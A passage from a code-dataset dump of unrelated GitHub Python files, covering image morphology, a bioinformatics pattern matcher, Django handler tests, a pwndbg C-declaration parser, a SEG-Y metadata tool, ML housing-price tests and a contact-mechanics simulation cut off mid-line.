J[j-1, i-1], J[j-1, i], J[j-1, i+1],\n J[j, i-1], J[j, i])\n J[j, i] = min([max(list1), I[j,i]])\n\n for j in range(height-2, -1, -1):\n for i in range(width-2, 0, -1):\n list2 = ( J[j, i], J[j, i+1],\n J[j+1, i-1], J[j+1, i], J[j+1, i+1] )\n J[j, i] = min([max(list2), I[j, i]])\n\n dif = J - img_auxiliar\n\n if np.amax(dif) == 0:\n flag = False\n\n return J\n\ndef geodesic_erosion(I, J):\n\n I = f.negative_gray(I)\n J = f.negative_gray(J)\n\n J = geodesic_dilation(I,J)\n\n I = f.negative_gray(I)\n J = f.negative_gray(J)\n\n return J\n\ndef closing_by_reconstruction(map, n):\n img_auxiliar = np.copy(map)\n Y = np.copy(map)\n\n Y = dilation(map, n)\n dilatada = np.copy(Y)\n J = geodesic_erosion(img_auxiliar, Y)\n\n return J\n\ndef maxima(img):\n height, width = img.shape\n img_auxiliar = np.copy(img)\n\n for j in range(0, height):\n for i in range(0, width):\n if img_auxiliar[j,i] > 0:\n img_auxiliar[j,i] = img_auxiliar[j,i] - 1\n\n img_auxiliar = geodesic_dilation(img, img_auxiliar)\n img = img - img_auxiliar\n img = f.threshold(img, 1)\n\n return img\n\ndef minima(img):\n img_auxiliar = np.copy(img)\n\n img_auxiliar = f.negative_gray(img_auxiliar)\n img_auxiliar = maxima(img_auxiliar)\n# img_auxiliar = f.negativoGrises(img_auxiliar)\n\n return img_auxiliar\n\ndef watershed(ime):\n height, width = ime.shape\n fp = np.copy(ime)\n gp = np.copy(ime)\n ims = np.copy(ime) # watershed\n mask = minima(ime) # minimos de ime\n imwl = etiquetado(mask) # vertientes\n\n # cv2.imshow(\"etiq\", mask)\n\n imwl[0,:] = 1000000\n imwl[:,0] = 1000000\n imwl[height-1,:] = 1000000\n imwl[:,width-1] = 1000000\n\n lista = []\n for i in range(0, 256):\n lista.append(i)\n # # fifo jerarquica\n fifoj = {key: [] for key in lista}\n\n for j in range(1, height-1):\n for i in range(1, width-1):\n if imwl[j,i] != 0:\n ban_ = 255\n for k in range(j-1, j+2):\n for l in range(i-1, i+2):\n ban_ = ban_ & imwl[k,l]\n if ban_ == 0:\n fifoj[ime[j,i]].append([j,i])\n\n i = 0\n while(i!=256):\n while(bool(fifoj[i]) is True):\n coord = fifoj[i].pop(0)\n\n for k in range(coord[0]-1, coord[0]+2):\n for l in range(coord[1]-1, coord[1]+2):\n if imwl[k,l] == 0:\n for n in range(k-1, k+2):\n for m in range(l-1, l+2):\n if imwl[n,m] != imwl[coord[0],coord[1]] and imwl[n,m] != 0 and imwl[n,m] != 1000000:\n ims[k,l] = 255\n imwl[k,l] = imwl[coord[0],coord[1]]\n fifoj[ime[k,l]].append([k,l])\n i = i + 1\n\n return ims, imwl\n\ndef etiquetado(img):\n imgAuxiliar = np.copy(img)\n img2 = np.copy(img)\n\n height, width = img.shape\n\n k = 0\n l = 10\n fifo = []\n\n lista = []\n for i in range(0, 3000):\n lista.append(i)\n # # fifo jerarquica\n fifoj = {key: 0 for key in lista}\n\n imgAuxiliar[0,:] = 0\n imgAuxiliar[:,0] = 0\n imgAuxiliar[height-1,:] = 0\n imgAuxiliar[:,width-1] = 0\n\n for j in range(0, height):\n for i in range(0, width):\n if imgAuxiliar[j,i] != 0:\n k = k + 1\n l = l + 1\n fifo.append([j,i])\n imgAuxiliar[j,i] = 0\n img2[j,i] = k\n fifoj[k] += 1\n while(fifo):\n primas = fifo.pop(0)\n for n in range(primas[0] - 1, primas[0] + 2):\n for m in range(primas[1] - 1, primas[1] + 2):\n if imgAuxiliar[n,m] != 0:\n fifo.append([n,m])\n imgAuxiliar[n,m] = 0\n img2[n,m] = k\n fifoj[k] += 1\n\n return img2\n","repo_name":"mantoniogr/gui-uaq-breast-cancer","sub_path":"morphology.py","file_name":"morphology.py","file_ext":"py","file_size_in_byte":6020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21083546924","text":"import sys; input = sys.stdin.readline\n\nwidth, length = map(int, input().split())\n\nif width >= 3:\n\tif length >= 6:\n\t\tprint(length - 2)\n\telif length == 5:\n\t\tprint(4)\n\telse:\n\t\tprint(length)\n\t\t\nelif width == 2:\n\tif length >= 7:\n\t\tprint(4)\n\telif length == 6 or length == 5:\n\t\tprint(3)\n\telif length == 3 or length == 4:\n\t\tprint(2)\n\telse:\n\t\tprint(1)\n\t\t\nelse:\n\tprint(1)\n","repo_name":"SquirtlesAlgorithmStudy/squirtlesAlgorithmStudy-S345","sub_path":"SeongYong/implementation/1783. 병든 나이트/병든 나이트.py","file_name":"병든 나이트.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"37109781382","text":"import matplotlib as mpl\nmpl.use('pdf')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport scipy.stats as stats\nfrom skylab import utils\nfrom scipy.stats import chi2, norm, exponweib\nfrom icecube.umdtools import cache,misc\nfrom icecube import icetray, dataclasses, histlite\nfrom optparse import OptionParser\nimport argparse\nfitfun = utils.FitDeltaChi2()\n\ndef getfig (fignum=None, aspect=None, width=None, figsize=None):\n aspect = aspect or 4/3.\n width = width or 7\n if figsize is None:\n figsize = (width, width / aspect)\n out = plt.figure (num=fignum, figsize=figsize)\n plt.clf ()\n return out\n\ndef pfig (*a, **kw):\n fig = getfig (*a, **kw)\n ax = fig.add_subplot (111)\n return fig, ax\n\n##This script should be able to plot the bckg TS, along with the TS for sensdisc, given any catalog and number of years - we'll ask cat, n as args.\n\n##arguments:\n\nparser = OptionParser (usage = '%prog [options]')\n\n\nparser.add_option ('--n', dest = 'n', type = int,\n default = 4, metavar = 'N',\n help = 'Number of years of data')\n\nopts, args = parser.parse_args ()\nyears = opts.n\n\n##Make plots prettier\nmisc.tex_mpl_rc()\nw=4\npropsmall = mpl.font_manager.FontProperties (size='small')\npropxsmall = mpl.font_manager.FontProperties (size='x-small')\n\nalldata = '/data/user/brelethford/Output/standard/allsky_sensitivity/{0}yr/'.format(str(years))\n\nbckg = alldata + 'background_trials/'\n\ndecbins=35\ndecs = np.linspace(-85.,85.,decbins)\ndecfolders = [bckg+'dec_{0:4f}/'.format(dec) for dec in decs]\n\nbins = 40\nrange = (0.0,40.0)\n\ndef chifit(datafolder):\n files = [cache.load(datafolder+file) for file in os.listdir(datafolder) if file.endswith('.array')]\n TS=[]\n for file in files:\n for entry in file:\n if entry[0]==0:\n if entry[1]<0:\n TS.append(0)\n else:\n TS.append(entry[1])\n TSs=TS\n chi2fit_flux= fitfun.fit(TSs)\n print('background only: median TS = {}'.format(str(chi2fit_flux.isf(0.5))))\n print ('max TS = {}'.format(str(max(TSs))))\n print ('Number of trials is: {}'.format(str(len(TSs))))\n print ('Percentage of TS=0 is: {}'.format(str(1.0-np.float(np.count_nonzero(TSs))/np.float(len(TSs)))))\n eta = chi2fit_flux.eta\n df = chi2fit_flux.params[0]\n \n return eta,df\n\netas,ndofs = np.array([chifit(dec) for dec in decfolders]).T\n\n## Now to plot. ##\nfig,ax = pfig()\n\nplt.plot(np.sin(np.radians(decs)), etas, label = 'eta', color = 'blue')\nplt.plot(np.sin(np.radians(decs)), ndofs, label = 'ndof', color = 'green')\nplt.ylim(0,2)\nplt.xlim(-1.,1.)\nplt.legend(loc='upper right', prop=propsmall)\nplt.xlabel(r'$\\sin(\\delta)$')\n\nmisc.ensure_dir ('/data/user/brelethford/AGN_Core/Plots/allsky/bg_tsds/{}yr/'.format(str(years)))\nfig.savefig ('/data/user/brelethford/AGN_Core/Plots/allsky/bg_tsds/{}yr/bg_tsds_eta_ndof.png'.format(str(years)))\nmisc.ensure_dir('/home/brelethford/public_html/skylab/allsky/bg_tsds/{}yr/'.format(str(years)))\nfig.savefig('/home/brelethford/public_html/skylab/allsky/bg_tsds/{}yr/bg_tsds_eta_ndof.png'.format(str(years)))\n\n","repo_name":"brelethford/IceCube","sub_path":"skylab/sensitivity/stacking_sensitivity/plotting/TSdist_allsky.py","file_name":"TSdist_allsky.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70922558971","text":"#coding=utf-8\nimport os\nimport numpy as np\nimport tensorflow as tf\n\n\n#区分为training,validation和test\ndef unpickle(file):\n import pickle\n with open(file, 'rb') as fo:\n dict = pickle.load(fo, encoding='bytes')\n return dict\n\ncwd = os.getcwd()\n\ndef get_training_data():\n dict = unpickle(cwd + '/cifar10/cifar10-batches-py/data_batch_' + str(1))\n images = dict[b'data']\n labels = dict[b'labels']\n filenames = dict[b'filenames']\n\n for i in range(2,5):\n idict = unpickle(cwd + '/cifar10/cifar10-batches-py/data_batch_' + str(i));\n dict = np.row_stack((dict,idict))\n\n iimages = idict[b'data']\n images = np.row_stack((images,iimages))\n\n ilabels = idict[b'labels']\n labels = np.column_stack((labels,ilabels))\n\n ifilenames = idict[b'filenames']\n filenames = np.row_stack((filenames,ifilenames))\n\n return {b'batch_label':'training batch,40000*3072',b'data':images,b'labels':labels,b'filenames':filenames}\n\ndef get_validation_data():\n dict = unpickle(cwd + '/cifar10/cifar10-batches-py/data_batch_' + str(5))\n dict[b'batch_label']='validation data,size is 10000*3072'\n return dict\n\ndef get_test_data():\n dict = unpickle(cwd + '/cifar10/cifar10-batches-py/test_batch')\n\n return dict\n\ntest_data = get_test_data()\nprint(test_data)\nvalidation_data = get_validation_data()\n\ntraining_data = get_training_data()\nprint(training_data)","repo_name":"jowettcz/deep_learning_study","sub_path":"cifar_old/loaddata.py","file_name":"loaddata.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"22335637013","text":"'''\nCreated on Oct 16, 2013\n\n@author: samriggs\n\nCODE CHALLENGE: Solve the Pattern Matching Problem (restated below).\nhttps://beta.stepic.org/Bioinformatics-Algorithms-2/Some-Hidden-Messages-are-More-Surprising-than-Others-3/#step-5\n'''\n\nfrom bi_utils.helpers import sane_open\nimport sys\n\ndef p_match(filename=\"stepic_dataset.txt\", pat=''):\n with sane_open(filename) as f:\n # Python WILL match newlines. so get rid of them.\n if (pat is ''):\n pattern = f.readline().rstrip('\\n')\n else:\n pattern = pat\n seq = f.readline().rstrip('\\n')\n start = 1\n index = 0 \n last_index = 0\n \n while (start + len(pattern) < len(seq)):\n # get the index of the first match\n index = seq.find(pattern, start)\n # exit if no matches found at all\n if index < 0:\n break\n # update last_index if a new one found, and print it out.\n if (last_index < index):\n # preceding space only if it's not the first match\n if (last_index is not 0): sys.stdout.write(\" \")\n sys.stdout.write(str(index))\n last_index = index\n \n if start < last_index:\n start = last_index\n else:\n start += 1\n\nif (__name__ == \"__main__\"):\n p_match()","repo_name":"samriggs/bioinf","sub_path":"Homeworks/bi-Python/chapter1/quiz3_solution.py","file_name":"quiz3_solution.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73702841852","text":"\"\"\"\nThis module tests the ``firestone.handlers.BaseHandler.is_catastrophic``\nmethods\n\"\"\"\nfrom firestone.handlers import BaseHandler\nfrom firestone.handlers import ModelHandler\nfrom firestone import exceptions\nfrom django.test import TestCase\nfrom django.test import RequestFactory\nfrom django.contrib.auth.models import User\nfrom model_mommy import mommy\n\ndef init_handler(handler, request, *args, **kwargs):\n # Mimicking the initialization of the handler instance\n handler.request = request\n handler.args = args\n handler.kwargs = kwargs\n return handler\n\nclass TestBaseHandlerIsCatastrophic(TestCase):\n def test_plural_delete_not_allowed(self):\n \"\"\"\n Plural DELETE is not allowed, so ``is_catastrophic`` will return True\n \"\"\"\n request = RequestFactory().delete('/')\n handler = init_handler(BaseHandler(), request)\n \n self.assertTrue(handler.is_catastrophic())\n\n def test_plural_delete_allowed(self):\n \"\"\"\n Plural DELETE is allowed, so ``is_catastrophic`` will return False\n \"\"\"\n request = RequestFactory().delete('/')\n handler = init_handler(BaseHandler(), request)\n handler.http_methods = ('PLURAL_DELETE',)\n\n self.assertFalse(handler.is_catastrophic())\n\n\n def test_plural_put_not_allowed(self):\n request = RequestFactory().put('/')\n handler = init_handler(BaseHandler(), request)\n\n self.assertTrue(handler.is_catastrophic())\n\n def test_plural_put_allowed(self):\n request = RequestFactory().put('/')\n handler = init_handler(BaseHandler(), request)\n handler.http_methods = ('PLURAL_PUT',)\n\n self.assertFalse(handler.is_catastrophic())\n","repo_name":"stargazer/django-firestone","sub_path":"testproject/testapp/tests/test_handlers_is_catastrophic.py","file_name":"test_handlers_is_catastrophic.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"72744433211","text":"from __future__ import annotations\n\nimport collections\n\nfrom pycparser import CParser # type: ignore\nfrom pycparser import c_ast\n\n\ndef extractTypeAndName(n, defaultName=None):\n if isinstance(n, c_ast.EllipsisParam):\n return (\"int\", 0, \"vararg\")\n\n t = n.type\n d = 0\n\n while isinstance(t, (c_ast.PtrDecl, c_ast.ArrayDecl)):\n d += 1\n children = dict(t.children())\n t = children[\"type\"]\n\n if isinstance(t, c_ast.FuncDecl):\n return extractTypeAndName(t)\n\n if isinstance(t.type, (c_ast.Struct, c_ast.Union, c_ast.Enum)):\n typename = t.type.name\n else:\n typename = t.type.names[0]\n\n if typename == \"void\" and d == 0 and not t.declname:\n return None\n\n name = t.declname or defaultName or \"\"\n return typename.lstrip(\"_\"), d, name.lstrip(\"_\")\n\n\nFunction = collections.namedtuple(\"Function\", (\"type\", \"derefcnt\", \"name\", \"args\"))\nArgument = collections.namedtuple(\"Argument\", (\"type\", \"derefcnt\", \"name\"))\n\n\ndef Stringify(X) -> str:\n return f\"{X.type} {X.derefcnt * '*'} {X.name}\"\n\n\ndef ExtractFuncDecl(node, verbose=False):\n # The function name needs to be dereferenced.\n ftype, fderef, fname = extractTypeAndName(node)\n\n if not fname:\n print(\"Skipping function without a name!\")\n print(node.show())\n return\n\n fargs = []\n for i, (argName, arg) in enumerate(node.args.children()):\n defname = \"arg%i\" % i\n argdata = extractTypeAndName(arg, defname)\n if argdata is not None:\n a = Argument(*argdata)\n fargs.append(a)\n\n Func = Function(ftype, fderef, fname, fargs)\n\n if verbose:\n print(Stringify(Func) + \"(\" + \",\".join(Stringify(a) for a in Func.args) + \");\")\n\n return Func\n\n\ndef ExtractAllFuncDecls(ast, verbose=False):\n Functions = {}\n\n class FuncDefVisitor(c_ast.NodeVisitor):\n def visit_FuncDecl(self, node, *a) -> None:\n f = ExtractFuncDecl(node, verbose)\n Functions[f.name] = f\n\n FuncDefVisitor().visit(ast)\n\n return Functions\n\n\ndef ExtractFuncDeclFromSource(source):\n try:\n p = CParser()\n ast = p.parse(source + \";\")\n funcs = ExtractAllFuncDecls(ast)\n for name, func in funcs.items():\n return func\n except Exception as e:\n import traceback\n\n traceback.print_exc()\n # eat it\n","repo_name":"pwndbg/pwndbg","sub_path":"pwndbg/lib/funcparser.py","file_name":"funcparser.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","stars":6166,"dataset":"github-code","pt":"78"} +{"seq_id":"74111263931","text":"import algoTests\nimport dataProcessing\nimport algos\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.metrics import mean_squared_error\nimport numpy as np\n\nnumpyArr = dataProcessing.prepData(\"training_set.csv\")\nscaledData, scaler = dataProcessing.scaleData(numpyArr)\n\ndef runAndTestRF():\n n_est = [1, 5, 10, 100, 1000]\n max_depths2 = [2, 3, 5, 8, 10]\n bootstrap = [True, False]\n\n maxr2RF = 0.8463203954661097\n ideal_n_est = 100\n ideal_depth_ = 10\n ideal_bootstrap = True\n mse = 0\n\n for n in n_est:\n for depth in max_depths2:\n for bool in bootstrap:\n r2 = algoTests.randomForest_test(scaledData, 10, n, depth, bool)\n if r2 > maxr2RF:\n maxr2RF = r2\n ideal_n_est = n\n ideal_depth_ = depth\n ideal_bootstrap = bool\n print(\"Max r2:\")\n print(r2)\n print(\"ideal estimators:\")\n print(n)\n print(\"ideal depth\")\n print(depth)\n print(\"ideal bootstrap:\")\n print(bool)\n print(\"\")\n \ndef runAndTestGB():\n learning_rates = [0.000625, 0.00125, 0.0025, 0.005] \n n_estimatorsArr = [2500, 5000, 10000, 18500] \n max_depths = [3, 6, 9]\n\n ideal_learningRate = 0.000625\n ideal_n_estimator = 18500\n ideal_depth = 3\n mse = 0\n\n maxr2 = 0.8549370158946126\n\n for lr in learning_rates:\n for n in n_estimatorsArr:\n for depth in max_depths:\n r2 = algoTests.gradientBoosting_test(scaledData, 10, lr, n, depth)\n if r2 > maxr2:\n print(\"new r2: \")\n print(r2)\n print(\"new ideal lr: \")\n print(lr)\n print(\"new ideal n est: \")\n print(n)\n print(\"New ideal depth\")\n print(depth)\n ideal_learningRate = lr \n ideal_n_estimator = n\n ideal_depth = depth\n maxr2 = r2\n print(\"\")\n\n\n print(\"Best r2 score: \")\n print(maxr2)\n print(\"\")\n print(\"Ideal learning rate: \")\n print(ideal_learningRate)\n print(\"\")\n print(\"Ideal number of estimators: \")\n print(ideal_n_estimator)\n print(\"\")\n print(\"Ideal depth:\")\n print(ideal_depth)\n print(\"\")\n\ndef runOptimalRF():\n r2 = algoTests.randomForest_test(scaledData, 10, 100, 10, True)\n \ndef runOptimalGB():\n r2 = algoTests.gradientBoosting_test(scaledData, 10, 0.000625, 18500, 3)\n\ndef runOptimalKNN():\n r2 = algoTests.knnr_test(scaledData, 10)\n \ndef runOptimalDNN():\n r2 = algoTests.dnn_test(scaledData, 10)\n\ndef saveOptimal_RFModel():\n algoTests.randomForest_getBestModel(scaledData, 30)\n \ndef saveOptimal_GBModel():\n algoTests.gradientBoost_getBestModel(scaledData, 30)\n \ndef saveOptimal_KNNModel():\n algoTests.knn_getBestModel(scaledData, 30)\n\ndef saveOptimal_DNNModel():\n algoTests.dnn_getBestModel(scaledData, 30)\n\n\nalgoTests.individual_price_predictor_geo()","repo_name":"isaacLabrieBoulay/HousePricePredictor","sub_path":"algoAnalyzer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9995030608","text":"import pickle\nfrom collections import defaultdict\nimport numpy as np\n\nNMF_Q = pickle.load(open(\"NMF_Q.pickle\", \"rb\"))\nNMF_model = pickle.load(open(\"NMF_model.pickle\", \"rb\"))\nNMF_P = pickle.load(open(\"NMF_P.pickle\", \"rb\"))\nmovies_list = pickle.load(open(\"movies_list.pickle\", 'rb'))\n# steps to take:\n# 1. impute 2.5 for unknown values from user:\n\n\ndef convert_user_info(user_movies):\n it = iter(user_movies)\n user_movies_dict = dict(zip(it, it))\n original_values = {k: float(v) for k, v in user_movies_dict.items()}\n return original_values\n\n\ndef get_rhat_user(original_values, movies_list, NMF_model, NMF_Q):\n user_values_array = np.asarray([original_values[movie] if movie in\n original_values.keys() else 0 for\n movie in movies_list])\n user_P = NMF_model.transform(user_values_array.reshape(1, -1))\n user_rhat = np.dot(user_P, NMF_Q)\n return user_rhat\n\n\ndef get_user_prediction_dict(movies_list, user_rhat):\n user_dict = dict(zip(movies_list, user_rhat[0]))\n user_pred_dict = defaultdict(list)\n {user_pred_dict[v].append(k) for k, v in user_dict.items()}\n return user_pred_dict\n\n\ndef get_movie_names(n, user_rhat, user_pred_dict, original_values):\n pred_sorted = np.sort(user_rhat)[0][::-1]\n movies_sorted = [] # list of lists\n sugg_movies = []\n for i in range(n*2):\n movies_sorted.append(user_pred_dict[pred_sorted[i]])\n print(movies_sorted)\n for movies_list in movies_sorted:\n for movie in movies_list:\n if (len(sugg_movies) < n and movie not in sugg_movies and movie not in original_values.keys()):\n sugg_movies.append(movie)\n return sugg_movies\n\n\ndef get_full_prediction(n, user_movies, movies_list, NMF_model, NMF_Q):\n original_values = convert_user_info(user_movies)\n user_rhat = get_rhat_user(original_values, movies_list, NMF_model, NMF_Q)\n user_pred_dict = get_user_prediction_dict(movies_list, user_rhat)\n sugg_movies = get_movie_names(n, user_rhat,\n user_pred_dict, original_values)\n return sugg_movies\n","repo_name":"thedinak/movie_recommender","sub_path":"recommender.py","file_name":"recommender.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2326464753","text":"#!/usr/bin/env python\n\n__doc__ ='''\nFill in a metadata template\n\n@requires: U{Python} >= 2.5\n@requires: U{epydoc} >= 3.0.1\n\n@undocumented: __doc__\n@since: 2009-Feb-03\n@status: under development\n@organization: U{CCOM}\n'''\n\nimport os, sys\nimport simplesegy.segy as segy\n\n# FIX: make this discoverable pluging\nfrom simplesegy.displays import text,kml\n\n# FIX: do this plugin style\nformats = ('text','kml')\n\ndef main():\n '''\n command line interface for templating\n '''\n from optparse import OptionParser\n parser = OptionParser(usage=\"%prog [options]\")\n\n parser.add_option('-f', '--format', dest='format', default='text',\n type = 'choice',\n choices = formats,\n help = 'output format. One of ' + ', '.join(formats) + ' [default: %default]')\n\n parser.add_option('-s','--summary', dest='summary', default=False, action='store_true',\n help='Summary data including bounding box, bounding time, and traces')\n\n\n parser.add_option('-t', '--text-header', dest='text_header', default=False, action='store_true',\n help='print the text header')\n\n parser.add_option('-b', '--bin-header', dest='bin_header', default=False, action='store_true',\n help='print the bin header')\n\n parser.add_option('-n','--trace-num',dest='trace_num',default=None,\n type='int',\n help='Get info about a trace number (starts from 0)')\n\n parser.add_option('-a', '--all-traces', dest='all_traces', default=False, action='store_true',\n help='Dump all traces')\n\n parser.add_option('-F','--trace-fields',dest='trace_fields', default = [],\n action='append',\n help='What fields to list for an all traces heading. Sugegest \"pos\" and \"time\" [default: %default]')\n\n parser.add_option('-T', '--trace-trailer-size', dest='trace_trailer_size', default=0,\n type='int',\n help='If vendors put in extra data after each trace (ODEC needs 320) [default: %default]')\n\n parser.add_option('-B', '--byte-swap', dest='swap_byte_order', default=False, action='store_true',\n help='Use this for files that have their byte order wrong (e.g. ODEC)')\n\n parser.add_option('-v', '--verbose', dest='verbose', default=False, action='store_true',\n help='run the tests run in verbose mode')\n\n (options, args) = parser.parse_args()\n o = options\n v = o.verbose\n\n for filename in args:\n filesize = os.path.getsize(filename) / 1000000. # Make it MB\n\n sgy = segy.Segy(filename, swap_byte_order=o.swap_byte_order, trace_trailer_size=o.trace_trailer_size)\n\n\n # FIX: turn this into something plugable\n if o.format=='text':\n out = sys.stdout\n text.convert(out, sgy,\n summary=o.summary,\n text_header=o.text_header,\n bin_header=o.bin_header,\n all_traces=o.all_traces,\n trace_fields=o.trace_fields,\n trace_num=o.trace_num,\n verbose=v\n )\n elif 'kml'==o.format:\n\n out = sys.stdout\n kml.convert(out, sgy,\n summary=o.summary,\n text_header=o.text_header,\n bin_header=o.bin_header,\n all_traces=o.all_traces,\n trace_fields=o.trace_fields,\n trace_num=o.trace_num,\n verbose=v\n )\n","repo_name":"schwehr/simplesegy","sub_path":"simplesegy/cmds/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":3790,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"36255195275","text":"import sqlite3\r\n\r\nconn = sqlite3.connect(\"Test.db\")\r\n\r\nc = conn.cursor()\r\n\r\n# Create table\r\nc.execute('''CREATE TABLE stocks\r\n (date text, trans text, symbol text, qty real, price real)''')\r\nimport random, string\r\n\r\n\r\ndef randomString(stringLength=10):\r\n \"\"\"Generate a random string of fixed length \"\"\"\r\n letters = string.ascii_lowercase\r\n return ''.join(random.choice(letters) for i in range(stringLength))\r\n\r\n\r\nrandom_text = [randomString() for i in range(10**6)]\r\nprint(\"Random String generated\")\r\nrandom_int = [str(random.randint(0,2000)) for i in range(10**6)]\r\nprint(\"Random String generated\")\r\nimport time\r\nprint(\"Starting ...\")\r\na = time.time()\r\nfor i,j in zip(random_text,random_int):\r\n c.execute(\"INSERT INTO stocks VALUES ('2006-01-05','{}','RHAT',{},35.14)\".format(i,j))\r\nprint(\"Finished 25000 Inserts in {}\".format(time.time()-a))","repo_name":"Gauthamastro/transfer","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39227688249","text":"import numpy as np\nfrom Adhesion.System import BoundedSmoothContactSystem\nfrom Adhesion.Interactions import PowerLaw\nfrom ContactMechanics import PeriodicFFTElasticHalfSpace\nfrom ContactMechanics.Tools.Logger import Logger\nfrom SurfaceTopography import Topography\n\nfrom PythonBib.TopographyGeneration import make_topography_from_function\n\nfrom NuMPI.IO.NetCDF import NCStructuredGrid\nfrom NuMPI import MPI\nimport time\nimport os, shutil \nfrom numpy import pi\nfrom NuMPI.Tools import Reduction\n\nfrom Adhesion.ReferenceSolutions.sinewave import JKR\nfrom CrackFront.Straight import SinewaveCrackFrontLoad\nfrom CrackFront.Optimization import trustregion_newton_cg\n\ncomm = MPI.COMM_WORLD\nprint(f\"comsize:{comm.size}\")\npnp = Reduction(comm)\noutputdir=\".\"\n#################### Paramters from JKR nondimensionalisation \n\nEs = 1 / np.pi \nh=1. # amplitude (half peak to valley) of the sinewave \nsinewave_lambda = 1. \nsx = 1. \n#################### Parameter Definition\n# JKR\nalpha = 0.3#$alpha\nwork_of_adhesion = w = alpha**2 * np.pi / 2\n#finite interaction range\nlength_parameter = 0.1#$rho\n\n# discretisation\nnx = 1024#$npx # number of pixels in the x direction\nny = 1024#$npy\n\ndx= sx / nx\ndy = dx\nsy = dy * ny\n\n# fluctuating work of adhesion\ndw = 0.7# $dw # maximum work of adhesion fluctuation\nlcor = 0.3#$lcor # correlation length: length of the highcut\nseed = 1#$seed\nfluctuation_length = sy\n\n## simulation parameters\nmax_rel_area = maxarea = 0.5# $maxarea\nstarting_displacement = -.25\ndelta_d = 0.05\n\n\nnp.random.seed(seed)\n# generated a random noise topopgraphy, filter it to force correlation lengtrh and set mean to 0\nw_fluct_topo = Topography(\n np.random.uniform(size=(nx, ny)), physical_sizes=(sx, sy), periodic=True\n ).highcut(cutoff_wavelength=lcor).detrend()\n\nw_topo = Topography((w_fluct_topo.scale(dw / np.max(np.abs(w_fluct_topo.heights()))\n ).heights() + 1) * work_of_adhesion,\n w_fluct_topo.physical_sizes)\n\nk_topo = Topography(np.sqrt(2 * Es * w_topo.heights()),\n physical_sizes=w_topo.physical_sizes, periodic=True)\nk_topo_interp = k_topo.interpolate_bicubic()\n\n#########################################\n\ninteraction = PowerLaw(w_topo.heights(),\n # v that way the max stress is still w / rho\n 3 * length_parameter *\n np.sqrt(w_topo.heights() / work_of_adhesion),\n 3\n , communicator=comm)\n\n\n\nprint(\"setup halfspace\")\nhalfspace = PeriodicFFTElasticHalfSpace((nx, ny), Es, (sx, sy),\n communicator=comm,\n fft=\"mpi\")\nprint(\"create topography\")\n\n\ntopography = make_topography_from_function(\n lambda x,y: (-1 - np.cos(2 * np.pi * x / sx)),\n (sx,sy),\n subdomain_locations=halfspace.topography_subdomain_locations,\n nb_subdomain_grid_pts=halfspace.topography_nb_subdomain_grid_pts,\n nb_grid_pts=(nx, ny),\n periodic=True,\n communicator=comm\n)\ncx, cy = [s / 2 - s /n /2 for s, n in zip((sx, sy), (nx, ny))]\nx, y = topography.positions()\n\ndef simulate_CM():\n system = BoundedSmoothContactSystem(halfspace, interaction, topography)\n\n gtol=1e-4\n if __name__ == '__main__':\n\n monitor=None\n disp0=None\n print(\"create nc file\")\n ncfile = NCStructuredGrid(outputdir+\"/CM.nc\", mode=\"w\" ,\n nb_domain_grid_pts=system.surface.nb_grid_pts,\n decomposition='subdomain',\n subdomain_locations=system.surface.subdomain_locations,\n nb_subdomain_grid_pts=system.surface.nb_subdomain_grid_pts,\n communicator=comm)\n\n starttime = time.time()\n try:\n mode=\"forward\"\n\n counter = 1\n i = 0\n j = 0\n displacement = starting_displacement\n mean_deformation = 0\n min_max_blind_cg = 8\n max_blind_cg = 0\n min_maxiter = 4000\n max_iter = min_maxiter\n main_logger = Logger(\"main.log\")\n absstarttime = time.time()\n while True:\n\n #print(\"##############################################################\")\n print(\"displacement = {}\".format(displacement))\n #print(\"##############################################################\")\n # change disp0 to preserve gap\n if disp0 is not None:\n disp0 += displacement - displacement_prev\n displacement_prev = displacement\n\n starttime= time.time()\n sol = system.minimize_proxy(\n disp0=disp0,\n lbounds=\"auto\",\n options=dict(gtol=gtol * abs(interaction.max_tensile) * system.surface.area_per_pt, ftol=0, maxcor=3),\n logger=Logger(\"laststep.log\"),\n offset=displacement,\n callback=None\n )\n elapsed_time=time.time() - starttime\n assert sol.success, sol.message\n\n u = disp0 = sol.x\n mean_deformation_prev = mean_deformation\n mean_deformation = pnp.sum(u) / np.prod(halfspace.nb_domain_grid_pts)\n\n force = - halfspace.evaluate_force(u)\n #\n #\n ncfile[i].contacting_points = contacting_points = np.where(system.gap == 0., 1., 0.)\n ncfile[i].contact_area =contact_area= pnp.sum(contacting_points) * halfspace.area_per_pt\n normal_force = force.sum()\n ncfile[i].mean_pressure = normal_force / np.prod(topography.physical_sizes)\n ncfile[i].displacement = displacement\n ncfile[i].mean_deformation = mean_deformation\n ncfile[i].elastic_energy = elastic_energy = system.substrate.energy\n ncfile[i].interaction_energy = interaction_energy = system.interaction.energy\n ncfile[i].energy = energy = system.energy\n\n rel_area = contact_area / np.prod(topography.physical_sizes)\n\n main_logger_headers = [\"step\", \"nit\", 